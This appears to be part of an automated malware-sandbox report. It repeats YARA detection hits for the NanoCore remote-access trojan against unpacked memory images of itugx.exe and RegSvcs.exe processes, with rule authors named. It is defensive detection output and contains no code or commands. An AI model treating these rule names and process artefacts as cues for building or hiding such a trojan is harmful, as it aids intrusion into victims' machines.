      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
